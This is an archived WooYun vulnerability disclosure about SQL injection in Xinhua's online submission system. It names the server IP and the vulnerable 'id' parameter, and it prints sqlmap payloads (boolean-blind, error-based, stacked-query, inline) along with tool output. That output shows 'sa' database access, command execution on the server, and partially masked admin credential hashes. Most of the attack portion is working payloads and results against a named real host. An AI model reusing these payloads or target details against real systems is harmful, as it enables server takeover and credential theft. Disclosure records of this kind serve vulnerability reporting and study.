乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-04: 细节已通知厂商并且等待厂商处理中 2015-03-09: 厂商已经确认,细节仅向厂商公开 2015-03-19: 细节向核心白帽子及相关领域专家公开 2015-03-29: 细节向普通白帽子公开 2015-04-08: 细节向实习白帽子公开 2015-04-18: 细节向公众公开
新华网在线投稿系统sql注入(SA权限),mssql继承system权限,可直接get服务器。
新华网在线投稿系统sql注入(SA权限),mssql继承system权限,可直接get服务器。地址:http://221.232.141.109/login.asphttp://221.232.141.109/ggDetail.asp?id=2登录处可以注册为普通用户进入系统,公告的字“id”过滤不严,存在sql注入。
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2 AND 8865=8865 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=2 AND 2728=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2728=2728) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113))) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=2; WAITFOR DELAY '0:0:5'-- Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6780=6780) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(107)+CHAR(113))---[23:48:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005[23:48:44] [INFO] fetching current user[23:48:44] [INFO] heuristics detected web page charset 'GB2312'[23:48:44] [INFO] retrieved: sa current user: 'sa'
执行cmd:
Windows IP ConfigurationEthernet adapter 本地连接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.10.251 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.1Windows IP ConfigurationEthernet adapter 本地连接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.10.251 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.1Windows IP ConfigurationEthernet adapter 本地连接: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.10.251 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.1
获取数据库字段和管理员用户:
解密:
*****ode**********1990.********************20ed93249cd49**********b2722ca880ef2**********f151e3b83c73fba2*****
过滤吧
危害等级:高
漏洞Rank:12
确认时间:2015-03-09 12:55
CNVD确认并复现该漏洞,已转由CNCERT向新华网通报。
暂无